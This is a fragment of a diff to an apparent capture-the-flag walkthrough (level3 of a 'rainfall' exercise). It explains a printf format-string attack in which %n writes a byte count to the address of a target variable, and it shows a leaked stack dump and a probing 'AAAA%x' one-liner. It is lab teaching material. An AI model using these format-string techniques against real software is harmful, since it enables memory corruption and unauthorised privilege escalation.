endcerro/rqinfall/level3/walkthrough.md

 200 b7fd1ac0 b7ff37d0 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 bfff000a
 ```

-In order for the exploit listed above to work, we need to pass the m address as a printf argument, take note of its index, and have a modifier for said argument that will change its value, it's %n that will write to the param that must be a point, the number of bytes written, in that case 64
+In order for the exploit listed above to work, we need to pass the m address as a printf argument, take note of its index, and have a modifier for said argument that will change its value, it's %n that will write to the param that must be a pointer to an int, the number of bytes written, in that case 64

 ```
 ~$ python -c 'print("AAAA%x " * 20)'| ./level3